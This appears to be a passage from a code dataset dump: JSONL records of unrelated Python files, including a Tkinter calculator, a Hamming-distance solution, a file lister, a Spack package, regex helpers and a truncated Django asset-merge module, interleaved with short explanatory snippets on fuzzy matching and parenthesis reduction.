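+The fuzzy-matching idea used in both filter_muni and correction_bairro, reduced to one function: map a raw value to the closest canonical name when the Levenshtein distance is under a cutoff (the cutoffs 4 and 3 mirror the code above):
+
+import Levenshtein
+
+def closest(name, canonical, cutoff=3):
+    best, best_dist = None, cutoff
+    for candidate in canonical:
+        d = Levenshtein.distance(name, candidate)
+        if d < best_dist:
+            best, best_dist = candidate, d
+    # fall back to the original spelling when nothing is close enough
+    return best if best is not None else name
+
+print(closest('FORTALEZZA', ['FORTALEZA', 'SOBRAL']))  # FORTALEZA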
+{"seq_id":"546632681","text":"#!/usr/bin/env python3\r\n#antuor:Alan\r\n \r\nimport re\r\nfrom functools import reduce\r\nfrom tkinter import *\r\n \r\n \r\n \r\n'''处理特殊-号运算'''\r\ndef minus_operation(expresstion):\r\n minus_operators = re.split(\"-\",expresstion)\r\n calc_list = re.findall(\"[0-9]\",expresstion)\r\n if minus_operators[0] ==\"\":\r\n calc_list[0] = '-%s' % calc_list[0]\r\n res = reduce(lambda x,y:float(x)-float(y),calc_list)\r\n print(\">>>>>>>>>>>>>>减号[%s]运算结果:\" % expresstion,res)\r\n return res\r\n \r\n'''reduce()对sequence连续使用function, 如果不给出initial, 则第一次调用传递sequence的两个元素,\r\n以后把前一次调用的结果和sequence的下一个元素传递给function'''\r\n \r\n \r\n \r\n \r\n'''处理双运算符号'''\r\ndef del_duplicates(expresstion):\r\n expresstion = expresstion.replace(\"++\",\"+\")\r\n expresstion = expresstion.replace(\"--\",\"-\")\r\n expresstion = expresstion.replace(\"+-\",\"-\")\r\n expresstion = expresstion.replace(\"--\",\"+\")\r\n expresstion = expresstion.replace('- -',\"+\")\r\n\r\n return expresstion\r\n \r\n'''*/运算函数'''\r\ndef mutiply_dividend(expresstion):\r\n calc_list = re.split(\"[*/]\",expresstion) #用* or /分割公式\r\n operators = re.findall(\"[*/]\",expresstion) #找出所有*和/号\r\n res = None\r\n for index,i in enumerate(calc_list):\r\n if res:\r\n if operators[index-1] =='*':\r\n res *= float(i)\r\n elif operators[index-1] =='/':\r\n res /=float(i)\r\n else :\r\n res = float(i)\r\n procession0 = \"[%s]运算结果=\" % expresstion,res\r\n final_result.insert(END,procession0) #插入窗体\r\n print(procession0)\r\n return res\r\n \r\n \r\n \r\n'''处理运算符号顺序混乱情况'''\r\ndef special_features(plus_and_minus_operators,multiply_and_dividend):\r\n \r\n for index,i in enumerate(multiply_and_dividend):\r\n i = i.strip()\r\n if i.endswith(\"*\") or i.endswith(\"/\"):\r\n multiply_and_dividend[index] = multiply_and_dividend[index] + plus_and_minus_operators[index] + multiply_and_dividend[index+1]\r\n del multiply_and_dividend[index+1]\r\n del plus_and_minus_operators[index]\r\n return plus_and_minus_operators,multiply_and_dividend\r\n \r\n \r\n \r\ndef minus_special(operator_list,calc_list):\r\n for index,i in enumerate(calc_list):\r\n if i =='':\r\n calc_list[index+1] = i + calc_list[index+1].strip()\r\n \r\n \r\n \r\n'''运算除了()的公式+-*/'''\r\ndef figure_up(expresstion):\r\n expresstion = expresstion.strip(\"()\") #去掉外面括号\r\n expresstion = del_duplicates(expresstion) #去掉重复+-号\r\n plus_and_minus_operators = re.findall(\"[+-]\",expresstion)\r\n multiply_and_dividend = re.split(\"[+-]\",expresstion)\r\n if len(multiply_and_dividend[0].strip()) ==0:\r\n multiply_and_dividend[1] = plus_and_minus_operators[0] + multiply_and_dividend[1]\r\n del multiply_and_dividend[0]\r\n del plus_and_minus_operators[0]\r\n \r\n plus_and_minus_operators,multiply_and_dividend = special_features(plus_and_minus_operators,multiply_and_dividend)\r\n for index,i in enumerate(multiply_and_dividend):\r\n if re.search(\"[*/]\",i):\r\n sub_res = mutiply_dividend(i)\r\n multiply_and_dividend[index] = sub_res\r\n \r\n print(multiply_and_dividend,plus_and_minus_operators) #计算\r\n final_res = None\r\n for index,item in enumerate(multiply_and_dividend):\r\n if final_res:\r\n if plus_and_minus_operators[index-1] == '+':\r\n final_res += float(item)\r\n elif plus_and_minus_operators[index-1] == '-':\r\n final_res -= float(item)\r\n else:\r\n final_res = float(item)\r\n procession = '[%s]计算结果:' % expresstion,final_res\r\n final_result.insert(END,procession) #插入窗体\r\n print(procession)\r\n return final_res\r\n \r\n\"\"\"主函数:运算逻辑:先计算拓号里的值,算出来后再算乘除,再算加减\"\"\"\r\ndef 
calculate():\r\n expresstion = expresstions.get() #获取输入框值\r\n flage = True\r\n calculate_res = None #初始化计算结果为None\r\n while flage:\r\n m = re.search(\"\\([^()]*\\)\",expresstion) #先找最里层的()\r\n # pattern = re.compile(r\"\\([^()]*\\)\")\r\n # m = pattern.match(expresstion)\r\n if m:\r\n sub_res = figure_up(m.group()) #运算()里的公式\r\n expresstion = expresstion.replace(m.group(),str(sub_res)) #运算完毕把结果替换掉公式\r\n else:\r\n print('---------------括号已经计算完毕--------------')\r\n procession1 = \"最终计算结果:\",figure_up(expresstion)\r\n final_result.insert(END,procession1) #插入窗体\r\n print('\\033[31m最终计算结果:',figure_up(expresstion))\r\n \r\n flage = False\r\n \r\n \r\nif __name__==\"__main__\":\r\n # res = calculate(\"1 - 2 * ( (60-30 +(-40/5) * (9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14 )) - (-4*3)/ (16-3*2) )\")\r\n window = Tk() ###创建窗体\r\n window.title('计算器') ###命名窗体\r\n frame1 = Frame(window) ###框架1\r\n frame1.pack() ###放置\r\n frame2 = Frame(window) ###框架2\r\n frame2.pack() ###放置\r\n lable = Label(frame1,text = \"请输入公式:\") ###文字标签\r\n lable.pack()\r\n expresstions = StringVar() ###输入框属性,字符串\r\n entryname = Entry(frame1,textvariable = expresstions) ###文本输入框\r\n bt_get_expresstions = Button(frame1,text = \"提交\",command = calculate) ###按钮挂件\r\n bt_get_expresstions.pack()\r\n entryname.pack()\r\n lable.grid(row=1, column=1) ###位置\r\n entryname.grid(row=1, column=2)\r\n bt_get_expresstions.grid(row=1, column=3)\r\n final_result = Text(frame2) ###计算结果显示框\r\n final_result.tag_config(\"here\", background=\"yellow\", foreground=\"blue\")\r\n final_result.pack()\r\n window.mainloop() ###事件循环","sub_path":"内部模块/计算器ed_err.py","file_name":"计算器ed_err.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
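+
+The heart of calculate() is the innermost-parentheses reduction; a compact sketch with eval() standing in for figure_up(), just to show the loop (not how the calculator itself evaluates sub-expressions):
+
+import re
+
+expr = "1 - 2 * ((6 - 3) * (4 + 1))"
+while True:
+    m = re.search(r"\(([^()]*)\)", expr)   # matches innermost parentheses only
+    if not m:
+        break
+    expr = expr.replace(m.group(), str(eval(m.group(1))))
+print(expr, "=", eval(expr))  # 1 - 2 * 15 = -29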
+{"seq_id":"273010579","text":"# Problem available at: https://leetcode.com/explore/challenge/card/july-leetcoding-challenge/544/week-1-july-1st-july-7th/3381/\n\n# Question:\n'''\nThe Hamming distance between two integers is the number of positions at which the corresponding bits are different.\n\nGiven two integers x and y, calculate the Hamming distance.\n'''\n\nclass Solution:\n def hammingDistance(self, x: int, y: int) -> int:\n \n output = x^y\n \n output = bin(output) \n \n return output.count('1')","sub_path":"HammingDistance.py","file_name":"HammingDistance.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"469207830","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 27 11:11:10 2016\r\n\r\n@author: lty765\r\n\"\"\"\r\n'''\r\nneed to add:\r\n\r\n'''\r\n#Seek all files in a certain directory\r\n#nta:file name\r\ntemp = []\r\ndef fileseek(addr):\r\n import os\r\n try:\r\n os.chdir(addr) \r\n for file in os.listdir(addr):\r\n if os.path.isdir(file):\r\n newfile = os.path.join(os.getcwd(),file)\r\n temp.append(fileseek(newfile))\r\n os.chdir('..')\r\n else: \r\n temp.append(file)\r\n except:\r\n pass\r\n\r\n#print(fileseek('H:\\\\python'))\r\n#fileseek('H:\\\\')\r\n\r\n#Get the partition of the harddisk\r\ndef disk(): \r\n import wmi\r\n c = wmi.WMI () \r\n d = []\r\n for physical_disk in c.Win32_DiskDrive (): \r\n for partition in physical_disk.associators (\"Win32_DiskDriveToDiskPartition\"): \r\n for logical_disk in partition.associators (\"Win32_LogicalDiskToPartition\"): \r\n d.append(logical_disk.Caption)\r\n return d\r\n \r\n#print(disk())\r\n\r\n#nta:disk name\r\n#currently not use,spending too much time!\r\ndef diskseek():\r\n hard_disk = disk()\r\n temp = []\r\n for item in hard_disk:\r\n if item != 'C:':\r\n temp.append(fileseek(item+'\\\\'))\r\n return temp\r\n\r\n\r\n#done \r\ndef test(choose_disk='H:'):\r\n disk_now = disk()\r\n if choose_disk in disk_now: \r\n import time\r\n start = time.time()\r\n fileseek(choose_disk+'\\\\')\r\n end = time.time()\r\n cost = end - start\r\n print('Running time: %f'%cost)\r\n else:\r\n print('Disk doesn\\'t exist,please try another disk.')\r\n \r\n \r\ntemp1 = []\r\ndef tree2list(L):\r\n for i in L:\r\n if isinstance(i,list):\r\n tree2list(i)\r\n else:\r\n temp1.append(i) \r\n \r\n \r\ndef file_search(L,*kind):\r\n temp = []\r\n for f in L:\r\n if f!=None:\r\n for k in kind:\r\n if f[-len(k):]==k:\r\n temp.append(f)\r\n return temp \r\n \r\n","sub_path":"sp.py","file_name":"sp.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"593581361","text":"__doc__ = \"\"\"Image chunk class\"\"\"\nimport numpy as np\nfrom chunkflow.chunk import Chunk\n\nclass AffinityMap(Chunk):\n \"\"\"\n a chunk of affinity map. It has x,y,z three channels with single precision.\n \"\"\"\n def __new__(cls, array, **kwargs):\n if 'global_offset' in kwargs:\n global_offset = kwargs['global_offset']\n elif isinstance(array, Chunk):\n global_offset = array.global_offset\n else:\n global_offset = None\n\n assert np.issubdtype(array.dtype, np.floating)\n assert 4 == array.ndim\n assert 3 == array.shape[0] \n obj = Chunk(array, global_offset=global_offset, *kwargs).view(cls)\n return obj\n\n def quantize(self):\n # only use the last channel, it is the Z affinity\n # if this is affinitymap\n image = self[-1, :, :, :]\n image = (image * 255).astype(np.uint8)\n return image\n \n\n\n\n","sub_path":"chunkflow/chunk/affinity_map/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"258180859","text":"# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\nimport os\n\nfrom spack.package import *\n\n\nclass BlasrLibcpp(Package):\n \"\"\"Blasr_libcpp is a library used by blasr\n and other executables such as samtoh5,\n loadPulses for analyzing PacBio sequences.\"\"\"\n\n homepage = \"https://github.com/PacificBiosciences/blasr_libcpp\"\n url = \"https://github.com/PacificBiosciences/blasr_libcpp/archive/5.3.1.tar.gz\"\n\n maintainers = [\"robqiao\"]\n\n version(\"5.3.1\", sha256=\"45a673255bfe7e29ed1f5bdb6410aa45cb6b907400d038c3da9daf1058b09156\")\n\n depends_on(\"pbbam\")\n depends_on(\"hdf5+cxx@1.8.12:1.8\")\n # maximum version is 1.8.20 currently. There doesn't appear to be a\n # major version 1.9 and the 1.10.1 version doesn't build correctly.\n # https://github.com/PacificBiosciences/blasr/issues/355\n\n depends_on(\"python@2.7:2.8\", type=\"build\")\n\n @run_before(\"install\")\n def configure(self, spec, prefix):\n configure_args = [\n \"PBBAM_INC={0}\".format(self.spec[\"pbbam\"].prefix.include),\n \"PBBAM_LIB={0}\".format(self.spec[\"pbbam\"].prefix.lib),\n \"HDF5_INC={0}\".format(self.spec[\"hdf5\"].prefix.include),\n \"HDF5_LIB={0}\".format(self.spec[\"hdf5\"].prefix.lib),\n ]\n python(\"configure.py\", *configure_args)\n\n @run_before(\"install\")\n def build(self, spec, prefix):\n os.environ[\"CPLUS_INCLUDE_PATH\"] = self.stage.source_path\n make()\n\n def install(self, spec, prefix):\n install_tree(\"alignment\", prefix.alignment)\n install_tree(\"hdf\", prefix.hdf)\n install_tree(\"pbdata\", prefix.pbdata)\n\n def setup_dependent_build_environment(self, env, dependent_spec):\n env.prepend_path(\"LD_LIBRARY_PATH\", self.spec.prefix.hdf)\n env.prepend_path(\"LD_LIBRARY_PATH\", self.spec.prefix.alignment)\n env.prepend_path(\"LD_LIBRARY_PATH\", self.spec.prefix.pbdata)\n\n def setup_run_environment(self, env):\n env.prepend_path(\"LD_LIBRARY_PATH\", self.spec[\"blasr-libcpp\"].prefix.pbdata)\n env.prepend_path(\"LD_LIBRARY_PATH\", self.spec[\"blasr-libcpp\"].prefix.alignment)\n env.prepend_path(\"LD_LIBRARY_PATH\", self.spec[\"blasr-libcpp\"].prefix.hdf)\n","sub_path":"var/spack/repos/builtin/packages/blasr-libcpp/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"653762943","text":"import re\n\n\ndef count_n_repetitions(text, n=1):\n \"\"\"\n Counts how often characters are followed by themselves for\n n times.\n\n text: UTF-8 compliant input text\n n: How often character should be repeated, defaults to 1\n \"\"\"\n count = 0\n for i, char in enumerate(text, start=0):\n if re.match(rf\"{re.escape(char)}(?={re.escape(char)}{{{n}}})\", text[i:]):\n count += 1\n return count\n\n\ndef count_n_reps_or_n_chars_following(text, n=1, char=\"\"):\n \"\"\"\n Counts how often characters are repeated for n times, or\n followed by char n times.\n\n text: UTF-8 compliant input text\n n: How often character should be repeated, defaults to 1\n char: Character which also counts if repeated n times\n \"\"\"\n if char == \"\":\n return count_n_repetitions(text, n)\n\n count = 0\n for i, c in enumerate(text, start=0):\n pattern_c = re.compile(rf\"{re.escape(c)}(?={re.escape(c)}{{{n}}})\")\n pattern_char = re.compile(rf\"{re.escape(c)}(?={re.escape(char)}{{{n}}})\")\n if re.match(pattern_c, text[i:]):\n count += 1\n continue\n if re.match(pattern_char, text[i:]):\n count += 1\n return count\n\n\ndef check_surrounding_chars(text, surrounding_chars):\n \"\"\"\n Count the number of times a character is surrounded by\n characters from the surrounding_chars list.\n\n text: UTF-8 compliant input text\n surrounding_chars: List of characters\n \"\"\"\n escaped_surround_chars = re.escape(\"\".join(surrounding_chars))\n surround_pattern = \"[\" + escaped_surround_chars + \"]\"\n\n hits = re.findall(\n rf\"\"\"\n (?<= # start look-behind group\n {surround_pattern}\n ) # end look-behind group\n (.) # match all characters\n (?= # start look-ahead group\n {surround_pattern}\n ) # end look-ahead group\n \"\"\",\n text,\n flags=re.DOTALL | re.VERBOSE,\n )\n\n return len(hits)\n\n\ndef main() -> int:\n pass\n\n\nif __name__ == \"__main__\":\n print(check_surrounding_chars(\"ABCCBAAAZz\", [\"Z\", \"A\"]))\n exit(main())\n","sub_path":"280/regex_lookahead_lookbehind.py","file_name":"regex_lookahead_lookbehind.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"286283867","text":"from rest_framework import viewsets, filters\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.pagination import LimitOffsetPagination\n\nfrom rest_framework.settings import api_settings\nfrom rest_framework_csv.renderers import CSVRenderer\n\nfrom assets.models import RawAsset, Asset, AssetType, Category, Tag, TargetPopulation, ProvidedService, Location, Organization\nfrom assets.serializers import AssetSerializer, AssetGeoJsonSerializer, AssetListSerializer, AssetTypeSerializer, \\\n CategorySerializer, FullLocationSerializer\n\nfrom assets.management.commands.util import parse_cell, standardize_phone\n\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom assets.forms import UploadFileForm\nfrom assets.utils import distance\n\nimport os, pytz\nfrom datetime import datetime, timedelta\nfrom assets.tasks import sync_assets_to_carto_eventually\n\ndef there_is_a_field_to_update(row, fields_to_check):\n \"\"\"Scan record for certain fields and see if any exist\n and are non-null (meaning that a Location could be\n created.\"\"\"\n update_is_needed = False\n for field in fields_to_check:\n if field in row and row[field] not in ['', None]:\n return True\n return update_is_needed\n\ndef boolify(x): # This differs from the assets.management.commands.util versiion of boolify.\n if x.lower() in ['true', 't']:\n return True\n if x.lower() in ['false', 'f']:\n return False\n return None\n\ndef eliminate_empty_strings(xs):\n return [x for x in xs if x != '']\n\ndef non_blank_type_or_none(row, field, desired_type): # This could be imported from elsewhere.\n \"\"\"This function tries to cast the value of row[field] to\n the passed desired type (e.g, float or int). 
If it fails,\n or if the passed value is an empty string (which is how\n None values are passed by CSVs), it returns None.\n\n Note that this does not yet support fields like\n PhoneNumberField, URLField, and EmailField.\"\"\"\n if field in row:\n if row[field] == '':\n return None\n if desired_type == bool:\n return boolify(row[field])\n try:\n return desired_type(row[field])\n except ValueError:\n if desired_type == int:\n try:\n return int(float(row[field])) # This is necessary to handle\n # cases where Excel obliviously appends \".0\" to integers.\n except ValueError:\n return None\n return None\n return None\n\ndef pipe_delimit(xs):\n return '|'.join([str(x) for x in xs])\n\ndef list_of(named_things):\n # This converts ManyToManyField values back to a list.\n return [t.name for t in named_things.all()]\n\ndef check_or_update_value(instance, row, mode, more_results, source_field_name, field_type=str):\n if source_field_name not in row:\n return instance, more_results\n new_value = non_blank_type_or_none(row, source_field_name, field_type)\n\n old_value = getattr(instance, source_field_name)\n if new_value != old_value:\n more_results.append(f\"{source_field_name} {'will be ' if mode == 'validate' else ''}changed from {old_value} to {new_value}.\")\n setattr(instance, source_field_name, new_value)\n return instance, more_results\n\n\ndef modify_destination_asset(mode, row, destination_asset, created_new_asset, more_results):\n error = False\n if 'location_id' in row:\n location_id = row['location_id']\n if location_id in ['', None, 'new']:\n # Create a new Location instance to be populated.\n location = None # Location creation happens below.\n else:\n location = Location.objects.get(pk=location_id)\n else: # If the location_id field is omitted from the merge instructions,\n # fall back to the destination asset's location (which may be None).\n location = destination_asset.location\n\n # I'm choosing to not update the Location.name field here since we may want to manually name Location instances,\n # particularly to deal with cases like the two restaurant locations in Schenley Plaza that have the same\n # street address and parcel ID but slightly different geocoordinates.\n if location is None:\n if there_is_a_field_to_update(row, ['street_address', 'municipality', 'city', 'state', 'zip_code', 'parcel_id', 'latitude', 'longitude']):\n if mode == 'update':\n more_results.append(f\"Creating a new Location for this Asset.\")\n else:\n more_results.append(f\"A new Location would be created for this Asset.\")\n location = Location()\n elif there_is_a_field_to_update(row, ['residence', 'iffy_geocoding', 'unit', 'unit_type', 'available_transportation', 'geocoding_properties']):\n more_results.append(\"There is not enough information to create a new location for this Asset, but there are fields in the merge-instructions file which need to be assigned to a Location. Does not compute! ABORTING!!!
\")\n return None, more_results, True\n\n if 'organization_id' in row:\n organization_id = row['organization_id']\n if organization_id in ['', None, 'new']:\n # Create a new Organization instance to be populated.\n organization = None # Organization creation happens below.\n else:\n organization = Organization.objects.get(pk=organization_id)\n else: # If the organization_id field is omitted from the merge instructions,\n # fall back to the destination asset's organization (which may be None).\n organization = destination_asset.organization\n\n\n asset_name = row['name']\n if asset_name != destination_asset.name:\n more_results.append(f\"asset_name {'will be ' if mode == 'validate' else ''}changed from {destination_asset.name} to {asset_name}.\")\n destination_asset.name = asset_name\n\n # [ ] Oddball legacy conversion to be deleted:\n source_field_name = 'accessibility_features'\n if source_field_name in row:\n new_value = boolify(row[source_field_name])\n old_value = destination_asset.accessibility\n if new_value != old_value:\n more_results.append(f\"{source_field_name} {'will be ' if mode == 'validate' else ''}changed from {old_value} to {new_value}.\")\n destination_asset.accessibility = new_value\n\n\n missing_organization_identifier = True\n if 'organization_name' in row and row['organization_name'] not in ['', None]:\n missing_organization_identifier = False\n elif 'organization_id' in row and row['organization_id'] not in ['', None]:\n missing_organization_identifier = False\n # Which is about the same as what I originally wrote:\n # missing_organization_identifier = (('organization_name' not in row) or (row['organization_name'] == '')) and (('organization_id' not in row) or (row['organization_id'] == ''))\n # but whatever.\n\n if missing_organization_identifier:\n # The organization can be identified EITHER by the organization_id value or by the organization_name value.\n if ('organization_phone' in row and row['organization_phone'] != '') or ('organization_email' in row and row['organization_email'] != ''):\n more_results.append(f\"The organization's name or ID value is required if you want to change either the phone or e-mail address (as a check that the correct Organization instance is being updated. ABORTING!!!!\\n
.\")\n return None, more_results, True\n #else: This is being removed for now since it seems like it could accidentally delete extant organizations.\n # destination_asset.organization = None # Set ForiegnKey to None.\n # more_results.append(f\" Since the organization has not been clearly identified by name or ID, the Asset's organization is being set to None and other fields (organization_phone and organization email) are being ignored.\")\n else:\n if organization is None:\n if mode == 'update':\n more_results.append(f\"Creating a new Organization for this Asset.\")\n else:\n more_results.append(f\"A new Organization would be created for this Asset.\")\n organization = Organization() # Create new organization instance.\n\n source_field_name = 'organization_name'\n destination_field_name = 'name'\n new_value = non_blank_type_or_none(row, source_field_name, str)\n old_value = organization.name\n if new_value != old_value:\n more_results.append(f\"organization.{destination_field_name} {'will be ' if mode == 'validate' else ''}changed from {old_value} to {new_value}.\")\n organization.name = new_value\n\n # check_or_update_value() can not be used without adding separate handling of source_field_name and destination_field_name.\n source_field_name = 'organization_email'\n if source_field_name in row:\n destination_field_name = 'email'\n new_value = non_blank_type_or_none(row, source_field_name, str)\n old_value = organization.email\n if new_value != old_value:\n more_results.append(f\"organization.{destination_field_name} {'will be ' if mode == 'validate' else ''}changed from {old_value} to {new_value}.\")\n organization.email = new_value\n\n source_field_name = 'organization_phone'\n if source_field_name in row:\n new_value = standardize_phone(non_blank_type_or_none(row, source_field_name, str))\n old_value = organization.phone\n if new_value != old_value:\n more_results.append(f\"organization.{destination_field_name} {'will be ' if mode == 'validate' else ''}changed from {old_value} to {new_value}.\")\n organization.phone = new_value\n\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'street_address', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'unit', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'unit_type', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'municipality', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'city', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'state', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'zip_code', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'parcel_id', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'residence', field_type=bool)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'iffy_geocoding', field_type=bool)\n\n if 'latitude' in row or 'longitude' in row:\n old_latitude, old_longitude = location.latitude, location.longitude\n location, more_results = 
location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'street_address', field_type=str)\n    location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'unit', field_type=str)\n    location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'unit_type', field_type=str)\n    location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'municipality', field_type=str)\n    location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'city', field_type=str)\n    location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'state', field_type=str)\n    location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'zip_code', field_type=str)\n    location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'parcel_id', field_type=str)\n    location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'residence', field_type=bool)\n    location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'iffy_geocoding', field_type=bool)\n\n    if 'latitude' in row or 'longitude' in row:\n        old_latitude, old_longitude = location.latitude, location.longitude\n    location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'latitude', field_type=float)\n    location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'longitude', field_type=float)\n    if 'latitude' in row or 'longitude' in row:\n        dist = distance(old_latitude, old_longitude, location.latitude, location.longitude)\n        if dist is not None:\n            more_results.append(f\" The distance between the old and new coordinates is {dist:.2f} feet.\")\n\n    location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'available_transportation', field_type=str)\n    location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'geocoding_properties', field_type=str)\n\n    # BEGIN Handle parent_location and parent_location_id\n    source_field_name = 'parent_location_id'\n    new_value = non_blank_type_or_none(row, source_field_name, str)\n    old_value = getattr(getattr(location, 'parent_location', None), 'id', None)\n\n    if new_value != old_value:\n        more_results.append(f\"{source_field_name} {'will be ' if mode == 'validate' else ''}changed from {old_value} to {new_value}.\")\n        if new_value is None:\n            location.parent_location = None # Clear the link rather than looking up a None primary key.\n        else:\n            location.parent_location = Location.objects.get(pk = new_value)\n\n    if 'parent_location' in row:\n        parent_location_name = getattr(getattr(location, 'parent_location', None), 'name', None)\n        more_results.append(f\"The parent_location name (after any parent_location_id updates) {'would be' if mode == 'validate' else 'is'} {parent_location_name}. [The 'parent_location' value in the merge-instructions file is not used to make updates.]\")\n    # END Handle parent_location and parent_location_id\n\n    destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'url', field_type=str)\n    destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'email', field_type=str)\n    source_field_name = 'phone'\n    if source_field_name in row:\n        new_value = standardize_phone(non_blank_type_or_none(row, source_field_name, str))\n        old_value = destination_asset.phone\n        if new_value != old_value:\n            more_results.append(f\"{source_field_name} {'will be ' if mode == 'validate' else ''}changed from {old_value} to {new_value}.\")\n            destination_asset.phone = new_value\n    destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'hours_of_operation', field_type=str)\n    destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'holiday_hours_of_operation', field_type=str)\n    destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'periodicity', field_type=str)\n    destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'capacity', field_type=int)\n    destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'wifi_network', field_type=str)\n    destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'wifi_notes', field_type=str)\n    destination_asset, more_results = 
check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'internet_access', field_type=bool)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'computers_available', field_type=bool)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'accessibility', field_type=bool)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'open_to_public', field_type=bool)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'child_friendly', field_type=bool)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'sensitive', field_type=bool)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'localizability', field_type=str)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'etl_notes', field_type=str)\n\n # Unfortunately the many-to-many relations that follow can not be set on an Asset until it has been saved,\n # so for cases where created_new_asset == True, we have to save the Asset once at this point so it has an\n # id value.\n if created_new_asset and mode == 'update':\n destination_asset._change_reason = \"Asset Updater: Initial save of Asset to allow many-to-many relationships\"\n destination_asset.save(override_carto_sync = created_new_asset)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'do_not_display', field_type=bool)\n # do_not_display must be set after the destination asset is initially saved since if\n # a new asset is created, it could be initially locationless and therefore have\n # do_not_display auto-set to True.\n\n source_field_name = 'asset_type'\n new_values = eliminate_empty_strings(row[source_field_name].split('|'))\n list_of_old_values = list_of(destination_asset.asset_types) if not created_new_asset else []\n if set(new_values) != set(list_of_old_values):\n more_results.append(f\"asset_type {'will be ' if mode == 'validate' else ''}changed from {pipe_delimit(list_of_old_values)} to {pipe_delimit(new_values)}.\")\n if new_values == []:\n more_results.append(f\"asset_type can not be empty\\n ABORTING!!!\\n
\")\n        return None, None, None, more_results, True\n    try:\n        validated_asset_types = [AssetType.objects.get(name=asset_type) for asset_type in new_values] # Change get to get_or_create to allow creation of new asset types.\n        # It's better to require manual creation of new asset types for now since that encourages us to specify a Category (necessary for mapping).\n        if mode == 'update':\n            destination_asset.asset_types.set(validated_asset_types)\n    except AssetType.DoesNotExist:\n        more_results.append(f\"Unable to find one of these asset types: {new_values}.\\n ABORTING!!!\\n
\")\n        return None, None, None, more_results, True\n\n    source_field_name = 'tags'\n    if source_field_name in row:\n        new_values = eliminate_empty_strings(row[source_field_name].split('|'))\n        list_of_old_values = list_of(destination_asset.tags) if not created_new_asset else []\n        if set(new_values) != set(list_of_old_values):\n            more_results.append(f\"{source_field_name} {'will be ' if mode == 'validate' else ''}changed from {pipe_delimit(list_of_old_values)} to {pipe_delimit(new_values)}.\")\n            if mode == 'update':\n                if new_values == []:\n                    destination_asset.tags.clear()\n                else:\n                    validated_values = [Tag.objects.get_or_create(name=value)[0] for value in new_values]\n                    destination_asset.tags.set(validated_values)\n\n    source_field_name = 'services'\n    if source_field_name in row:\n        new_values = eliminate_empty_strings(row[source_field_name].split('|'))\n        list_of_old_values = list_of(destination_asset.services) if not created_new_asset else []\n        if set(new_values) != set(list_of_old_values):\n            more_results.append(f\"{source_field_name} {'will be ' if mode == 'validate' else ''}changed from 